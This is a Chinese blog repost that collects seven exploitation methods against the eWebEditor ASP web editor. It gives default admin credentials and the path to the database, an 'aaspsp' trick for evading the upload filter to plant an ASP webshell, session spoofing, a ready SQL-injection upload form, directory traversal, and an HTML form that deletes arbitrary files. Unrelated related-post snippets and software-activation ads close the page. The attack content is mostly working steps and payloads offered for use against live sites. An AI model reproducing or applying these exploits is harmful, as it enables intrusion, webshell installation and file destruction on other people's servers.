ewebeditor漏洞大全

ewebeditor漏洞大全1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp后台如果能进入:可点击样式管理:standard拷贝一份(直接修改改不了)在拷贝的一份里加入图片类型(asaaaspsp)  然后点预览在编辑器里点设计   然后直接上传asa大马.上传后在代码里可以看到马的位置!

大家好,又见面了,我是你们的朋友全栈君。

1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp

后台如果能进入:

可点击样式管理:

standard 拷贝一份(直接修改改不了)

在拷贝的一份里加入图片类型( asa aaspsp )   然后点预览

在编辑器里点设计    然后直接上传asa大马.

上传后 在代码里可以看到马的位置!

(原理:因为在iis里 网站的属性里 应用程序配置一项   asa扩展名还是用asp.dll来解析的,asp也是   还有 cer cdx )

在cer cdx asa的被删掉   那么马儿就找不到 映射不过去.

可以在拷贝过后的样式 图片类型里加入 aaspsp 然后在上传 直接就可以上传asp文件

—————————————————————————– 2:下载默认数据库

http://www.backlion.com/ewebeditor/db/ewebeditor.mdb

然后分析数据库

webeditor_system(1) 就可以看到用户名和密码   如果激活成功教程不出来

可以在webeditor_style(14 样式表里

主要看允许上传文件的扩展名(s-fileext s_ingeext)

看到一个小黑客曾经搞过 多了asa aaspsp

可以用他来利用!(后台找不到的情况下也可以用此方法)

可以构造语句:

比如   ID=46    s-name =standard1

构造 代码:   ewebeditor.asp?id=content&style=standard

             ID和和样式名改过后

             ewebeditor.asp?id=46&style=standard1

然后就是进入编辑器   上传asa 或者asp的    得到webshell

前面的1跟2说的是asp版的ewebeditor,其他如php,jsp跟asp的差不多,这里不多说.

针对这种方法可能出现的问题:

(1).使用默认用户名和密码无法登录。 请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。 (2).加了asa类型后发现还是无法上传。 应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的: sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”) 猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了“asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。 (3).上传了asp文件后,却发现该目录没有运行脚本的权限。 呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?

(4).已经使用了第2点中的方法,但是asp类型还是无法上传。 看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的“asp”删除。

漏洞原理 漏洞的利用原理很简单,请看Upload.asp文件: 任何情况下都不允许上传asp脚本文件 sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”) 因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!

—————————————————————————–

3.eWebEditor session欺骗漏洞

            eWebEditor在线编辑器

            漏洞文件:Admin_Private.asp

            漏洞语句:<%

            If Session(“eWebEditor_User”) = “” Then

            Response.Redirect “admin_login.asp”

            Response.End

            End If

            只判断了session,没有判断cookies和路径的验证问题。

            漏洞利用:

            新建一个h4x0r.asp内容如下:

            <%Session(“eWebEditor_User”) = “11111111”%>

            访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

            漏洞影响:虚拟主机的克星.

—————————————————————————–

4.ewebeditor asp版 2.1.6 上传漏洞

<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序</H1><br>

<form action=”http://www.backlion.come/upload.asp?action=save&type=IMAGE&style=luoye’ union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a” method=post name=myform enctype=”multipart/form-data”>

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=Fuck>

</form>

http://www.backlion.com/e/upload.asp

上传时修改此处上传地址。。。

如果你是上传的asp文件则成功后的地址为:

http://www.backlion.com/e/uploadfile/xxxxxxxxxx.asp

—————————————————————————–

5.ewebeditor遍历路径漏洞 Ewebeditor为非常常见的网站核心程序, 默认数据库为 /db/ewebeditor.mdb 默认路径admin_login.asp 默认管理员admin密码admin(admin888)

ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限.

但是ewebeditor后台有个小小的缺陷. 可以历遍整个网站目录. 当然.数据库为只读的时候一样可以利用.

上传文件管理—选择样式目录(随便选一个目录) 得到: ewebeditor/admin_uploadfile.asp?id=14 在id=14后面添加&dir=.. 再加 &dir=../.. &dir=../../../.. 看到整个网站文件了

—————————————————————————–

6.eweb2.7版本以下又一个注入

首先看代码(ewebeditor.asp): ub InitPara() ‘ 取全屏标志 sFullScreen = Trim(Request.QueryString(“fullscreen”)) ‘ 取对应的内容ID sContentID = Trim(Request.QueryString(“id”)) If sContentID = “” Then ShowErr “请传入调用参数ID,即隐藏的内容表单项ID!”

‘ 取样式初始值 sStyleName = Trim(Request.QueryString(“style”)) If sStyleName = “” Then sStyleName = “standard”

sSql = “select * from ewebeditor_style where s_name=’” & sStyleName & “‘” oRs.Open sSql, oConn, 0, 1 If Not oRs.Eof Then sStyleID = oRs(“S_ID”) sStyleName = oRs(“S_Name”) sStyleDir = oRs(“S_Dir”) sStyleCSS = oRs(“S_CSS”) sStyleUploadDir = oRs(“S_UploadDir”) nStateFlag = oRs(“S_StateFlag”) sDetectFromWord = oRs(“S_DetectFromWord”) sInitMode = oRs(“S_InitMode”) sBaseUrl = oRs(“S_BaseUrl”)

sStyleUploadDir = Replace(sStyleUploadDir, “\”, “/”) If Right(sStyleUploadDir, 1) <> “/” Then sStyleUploadDir = sStyleUploadDir & “/” End If Else ShowErr “无效的样式Style参数传入,如果要使用默认值,请留空!” End If oRs.Close 关键的是这两句: sStyleName = Trim(Request.QueryString(“style”)) If sStyleName = “” Then sStyleName = “standard”

sSql = “select * from ewebeditor_style where s_name=’” & sStyleName & “‘” 很明显的是style参数没有足够的过滤,如果我们自己给这个地方赋值的话,程序会报错的,

但接下来的一句还是让我们有可乘之机,If sStyleName = “” Then sStyleName = “standard”保留默认的还是会带入语句执行,加个单引号就报错了,如图2.[local]1[/local] 我试了好几款工具,发现只有pangolin可以注入,啊D只能发现注入不能继续猜解。 eweb默认的管理员表是:ewebeditor_system 这个表下的默认两个列名为:sys_UserName和sys_userpass 需要手动添加,

—————————————————————————–

7.ewebeditor2.8最终版删除任意文件漏洞

这个漏洞可以很鸡肋,也可以很致命,关键看你怎么利用!

此漏洞存在于ExampleNewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:

‘ 把带”|”的字符串转为数组 Dim aSavePathFileName aSavePathFileName = Split(sSavePathFileName, “|”) ‘ 删除新闻相关的文件,从文件夹中 Dim i For i = 0 To UBound(aSavePathFileName) ‘ 按路径文件名删除文件 Call DoDelFile(aSavePathFileName(i)) Next

而aSavePathFileName是前面从数据库取出来的:

sSavePathFileName = oRs(“D_SavePathFileName”)

看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:

sSavePathFileName = GetSafeStr(Request.Form(“d_savepathfilename”)) … oRs(“D_SavePathFileName”) = sSavePathFileName

居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:

Function GetSafeStr(str) GetSafeStr = Replace(Replace(Replace(Trim(str), “‘”, “”), Chr(34), “”), “;”, “”) End Function

无语,这不是过滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新闻,于是主目录下的eWebEditor.asp不见了!

下面给出利用的htm: <HTML><HEAD><TITLE>eWebEditor删除文件 by:oldjun(http://www.oldjun.com)</TITLE> <style>body,p,td,input {font-size:9pt}</style> </HEAD><BODY><a href=’list.asp’>新闻列表</a> | <a href=’add.asp’>增加新闻</a>

<b>增加新闻</b>

<form action=”http://www.backlion.com/editor/Example/NewsSystem/addsave.asp”  method=”post” name=”myform”>     <input type=hidden name=d_originalfilename>     <input type=hidden name=d_savefilename>     <table cellspacing=3 align=center> <tr><td>要删的文件(相对路径就可以了):</td> <td><input type=”text” name=”d_savepathfilename” value=”” size=”90″></td> </tr> <tr><td>新闻标题(随便填):</td> <td><input type=”text” name=”d_title” value=”” size=”90″></td> </tr> <tr><td>标题图片:</td> <td><select name=”d_picture” size=1><option value=”>无</option></select> 当编辑区有插入图片时,将自动填充此下拉框</td> </tr> <tr><td>新闻内容(随便填):</td> <td><textarea name=”d_content”></textarea></td> </tr> </table>

<input type=submit name=btnSubmit value=” 提 交 “>  <input type=reset name=btnReset value=” 重 填 “> </form> </BODY></HTML>

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/159048.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • Netty学习之读netty权威指南(一)

    Netty学习之读netty权威指南(一)大家问我为什么读这个来学netty,嗯嗯嗯??我也说不上来,因为我以前看过某个培训班的课程,初步了解了一下netty,但是现在回想一下发现我所有的知识基本忘光了,不过没关系,慢慢来,一点一点的找回来不久好了吗,现在开始咱们读一读Netty权威指南这本书,学习一下Netty。当然了不会全部按照这本书来,我会加上自己学习的东西。I/O演进之路JDK1.4以前Java对IO的支持不完…

  • yiq颜色模型应用于_如果rgb色彩模式中

    yiq颜色模型应用于_如果rgb色彩模式中00.目录文章目录00.目录01.YIQ模式概述02.NTSC制式03.YIQ模式优势04.RGB转YIQ05.附录01.YIQ模式概述YIQ,是NTSC(NationalTelevisionStandardsCommittee)电视系统标准。Y是提供黑白电视及彩色电视的亮度信号(Luminance),即亮度(Brightness),I代表In-phase,色彩从橙色到青色,Q代表Quadrature-phase,色彩从紫色到黄绿色。02.NTSC制式NTSC制式,又简称

    2022年10月24日
  • 怎么设置ie兼容性视图设置_ie浏览器兼容性视图怎么设置

    怎么设置ie兼容性视图设置_ie浏览器兼容性视图怎么设置【关键词】:IE兼容性视图【适用版本】:FusionAccess各版本【故障模式】:兼容性/应用软件兼容性【问题现象】:通过域策略和用户配置文件,设定IE的兼容性视图后,新发放虚拟机兼容性视图设置没有效果兼容性视图设置界面:工具->兼容性视图设置域策略配置界面:【告警信息】:无【问题分析】:通过processmonitor抓取IE兼容性视图设置更改的注册表项,通过脚本导入到当前登录用户…

  • js获取键盘的keyCode——-Day42

    js获取键盘的keyCode——-Day42

    2021年11月29日
  • BackTrack3(BT3激活成功教程wifi密码)

    BackTrack3(BT3激活成功教程wifi密码)BackTrack3(BT3激活成功教程)  准备工作  1、一个有可激活成功教程无线信号的环境。如我在家随便搜索出来的信号。  2、带无线网卡的电脑一台(笔记本台式机均可,只要无线网卡兼容BT3),我用的是三星NC10的上网本。  3、4G以上优盘一个(我用的是kingston8G的)  4、下载BT3,约900多兆。注:BT3全称BackTrack3,与我们常说的bt下载是完全不同的…

  • Ubuntu apt-get彻底卸载软件包

    Ubuntu apt-get彻底卸载软件包如果你关注搜索到这篇文章,那么我可以合理怀疑你被apt-get的几个卸载命令有点搞晕了。apt-get的卸载相关的命令有remove/purge/autoremove/clean/autoclean等。具体来说:apt-getpurge/apt-get–purgeremove删除已安装包(不保留配置文件)。如软件包a,依赖软件包b,则执行该命令会删除a,而且不保留配置文…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号